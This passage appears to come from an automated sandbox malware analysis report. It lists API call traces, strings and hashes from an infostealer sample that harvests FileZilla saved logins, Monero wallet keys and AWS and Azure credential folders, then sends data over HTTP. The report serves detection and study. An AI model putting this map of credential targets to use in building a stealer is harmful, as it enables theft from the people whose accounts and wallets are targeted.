                        • GetProcessHeap.KERNEL32(00000000,000F423F,006F0DBA,006F0DB7,006F0DB6,006F0DB3), ref: 006E0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 006E0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 006E03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 006E0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006E0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 006E0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 006E0571
                        • lstrcat.KERNEL32(?,url: ), ref: 006E0580
                        • lstrcat.KERNEL32(?,00000000), ref: 006E0593
                        • lstrcat.KERNEL32(?,006F1678), ref: 006E05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 006E05B5
                        • lstrcat.KERNEL32(?,006F167C), ref: 006E05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 006E05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 006E05E6
                        • lstrcat.KERNEL32(?,006F1688), ref: 006E05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 006E0604
                        • lstrcat.KERNEL32(?,00000000), ref: 006E0617
                        • lstrcat.KERNEL32(?,006F1698), ref: 006E0626
                        • lstrcat.KERNEL32(?,006F169C), ref: 006E0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 23eafcabbd11c85e5d6c5be48e62e8d71ce661ba7974976237c0e559bdafadd5
                        • Instruction ID: 00a179e28ebaf5d8f51b9abed88753c2c8043c2d01718f0aca11211e21f0e346
                        • Opcode Fuzzy Hash: 23eafcabbd11c85e5d6c5be48e62e8d71ce661ba7974976237c0e559bdafadd5
                        • Instruction Fuzzy Hash: 80D14D75912248ABDB44EBF5DD96EEE733AAF14300F41841CF102A6091EF74BE06DB66
                        Function 006D5960 Relevance: 44.2, APIs: 17, Strings: 8, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                          • Part of subcall function 006D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006D59F8
                        • StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D5A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D5B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E4EA18,00000000,?,00E4A930,00000000,?,006F1A1C), ref: 006D5E71
                        • lstrlen.KERNEL32(00000000), ref: 006D5E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 006D5E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D5E9A
                        • lstrlen.KERNEL32(00000000), ref: 006D5EAF
                        • lstrlen.KERNEL32(00000000), ref: 006D5ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006D5EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 006D5F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 006D5F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 006D5F4C
                        • InternetCloseHandle.WININET(00000000), ref: 006D5FB0
                        • InternetCloseHandle.WININET(00000000), ref: 006D5FBD
                        • HttpOpenRequestA.WININET(00000000,00E4E9F8,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D5BF8
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • InternetCloseHandle.WININET(00000000), ref: 006D5FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------$8$H$
                        • API String ID: 874700897-813867249
                        • Opcode ID: 3032a7b42fdbb8209cae139379fd2e81b495fd17982f4786c74a1c4ff5d9b5f8
                        • Instruction ID: b36c1b323e9b6e8553a8308ea89bfe35ed450565af055ad1b42d1911d63fe5fd
                        • Opcode Fuzzy Hash: 3032a7b42fdbb8209cae139379fd2e81b495fd17982f4786c74a1c4ff5d9b5f8
                        • Instruction Fuzzy Hash: 30123E71922258AADB55EBE1DC95FEEB33ABF14700F01419DB10662092EF703E49CF69
                        Function 006DCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006DCF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006DD0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006DD0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD208
                        • lstrcat.KERNEL32(?,006F1478), ref: 006DD217
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD22A
                        • lstrcat.KERNEL32(?,006F147C), ref: 006DD239
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD24C
                        • lstrcat.KERNEL32(?,006F1480), ref: 006DD25B
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD26E
                        • lstrcat.KERNEL32(?,006F1484), ref: 006DD27D
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD290
                        • lstrcat.KERNEL32(?,006F1488), ref: 006DD29F
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD2B2
                        • lstrcat.KERNEL32(?,006F148C), ref: 006DD2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD2D4
                        • lstrcat.KERNEL32(?,006F1490), ref: 006DD2E3
                          • Part of subcall function 006EA820: lstrlen.KERNEL32(006D4F05,?,?,006D4F05,006F0DDE), ref: 006EA82B
                          • Part of subcall function 006EA820: lstrcpy.KERNEL32(006F0DDE,00000000), ref: 006EA885
                        • lstrlen.KERNEL32(?), ref: 006DD32A
                        • lstrlen.KERNEL32(?), ref: 006DD339
                          • Part of subcall function 006EAA70: StrCmpCA.SHLWAPI(00E48FE8,006DA7A7,?,006DA7A7,00E48FE8), ref: 006EAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 006DD3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 7cefed35a263717c39aa19ffbbf244d255e62324a7f3396f8a33acb87d835e5d
                        • Instruction ID: 1d2cd69bbd56a4e569281bb40eed7f6b104318f3246c29ddcd8372107f3a2b4f
                        • Opcode Fuzzy Hash: 7cefed35a263717c39aa19ffbbf244d255e62324a7f3396f8a33acb87d835e5d
                        • Instruction Fuzzy Hash: 20E16E71912248ABDB44EBE1DD96EEE737ABF14300F01415CF106A7092EE34BE06DB66
                        Function 006E8320 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • RegOpenKeyExA.ADVAPI32(00000000,00E4B688,00000000,00020019,00000000,006F05B6), ref: 006E83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006E8426
                        • wsprintfA.USER32 ref: 006E8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006E847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E8499
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?$H
                        • API String ID: 3246050789-3047849134
                        • Opcode ID: eeb72b2acea62cb847b578be2079e711f605ab78833ad47f294f5a291c16571f
                        • Instruction ID: 0c1c3e6fd7ca37cf15273943c8e5c8c2b8be69563a8ad5b19438350e77e9b72a
                        • Opcode Fuzzy Hash: eeb72b2acea62cb847b578be2079e711f605ab78833ad47f294f5a291c16571f
                        • Instruction Fuzzy Hash: 39813D719122589FEB64DB91CC81FEAB7BABF08700F0082D9E109A6191DF716F85CF95
                        Function 006DC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E4CE88,00000000,?,006F144C,00000000,?,?), ref: 006DCA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006DCA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 006DCA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006DCAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 006DCAD9
                        • StrStrA.SHLWAPI(?,00E4CEA0,006F0B52), ref: 006DCAF7
                        • StrStrA.SHLWAPI(00000000,00E4D008), ref: 006DCB1E
                        • StrStrA.SHLWAPI(?,00E4DBA0,00000000,?,006F1458,00000000,?,00000000,00000000,?,00E48FC8,00000000,?,006F1454,00000000,?), ref: 006DCCA2
                        • StrStrA.SHLWAPI(00000000,00E4DCA0), ref: 006DCCB9
                          • Part of subcall function 006DC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 006DC871
                          • Part of subcall function 006DC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 006DC87C
                        • StrStrA.SHLWAPI(?,00E4DCA0,00000000,?,006F145C,00000000,?,00000000,00E49078), ref: 006DCD5A
                        • StrStrA.SHLWAPI(00000000,00E492A8), ref: 006DCD71
                          • Part of subcall function 006DC820: lstrcat.KERNEL32(?,006F0B46), ref: 006DC943
                          • Part of subcall function 006DC820: lstrcat.KERNEL32(?,006F0B47), ref: 006DC957
                          • Part of subcall function 006DC820: lstrcat.KERNEL32(?,006F0B4E), ref: 006DC978
                        • lstrlen.KERNEL32(00000000), ref: 006DCE44
                        • CloseHandle.KERNEL32(00000000), ref: 006DCE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: f84760af48bbd3fb1defd4bf04e0ff6a37d87af3c62c6bcd7a15f7dd5ab1fe06
                        • Instruction ID: 06c4546cab1ef1f18c94276f1f1b8a3062423a0f92b99a68f138d2481f5d1cf0
                        • Opcode Fuzzy Hash: f84760af48bbd3fb1defd4bf04e0ff6a37d87af3c62c6bcd7a15f7dd5ab1fe06
                        • Instruction Fuzzy Hash: AFE13B71D12248ABDB54EBE1DC91FEEB77AAF14300F01415DF10666192EF307A4ACB6A
                        Function 006E12D0 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 310COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID: P$
                        • API String ID: 2001356338-959893791
                        • Opcode ID: b26a6bc4e6654b1bf509ff048edd15d4c049531624285db7ca2fa66b2a34e400
                        • Instruction ID: 7cd0f257fb2ef81cf716c120016a59266ea3e9d8f7e77ee8aa5867f0ee4c694a
                        • Opcode Fuzzy Hash: b26a6bc4e6654b1bf509ff048edd15d4c049531624285db7ca2fa66b2a34e400
                        • Instruction Fuzzy Hash: 8FC1C5B59023489BCB54EF61DC89FEE737ABF54304F00449CE50A67142EA30AE85DFA5
                        Function 006E4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 006E4DCD
                          • Part of subcall function 006E4910: wsprintfA.USER32 ref: 006E492C
                          • Part of subcall function 006E4910: FindFirstFileA.KERNEL32(?,?), ref: 006E4943
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 006E4E59
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F0FDC), ref: 006E4971
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F0FE0), ref: 006E4987
                          • Part of subcall function 006E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006E4B7D
                          • Part of subcall function 006E4910: FindClose.KERNEL32(000000FF), ref: 006E4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006E4EE5
                          • Part of subcall function 006E4910: wsprintfA.USER32 ref: 006E49B0
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F08D2), ref: 006E49C5
                          • Part of subcall function 006E4910: wsprintfA.USER32 ref: 006E49E2
                          • Part of subcall function 006E4910: PathMatchSpecA.SHLWAPI(?,?), ref: 006E4A1E
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,00E4EA08), ref: 006E4A4A
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,006F0FF8), ref: 006E4A5C
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,?), ref: 006E4A70
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,006F0FFC), ref: 006E4A82
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,?), ref: 006E4A96
                          • Part of subcall function 006E4910: CopyFileA.KERNEL32(?,?,00000001), ref: 006E4AAC
                          • Part of subcall function 006E4910: DeleteFileA.KERNEL32(?), ref: 006E4B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
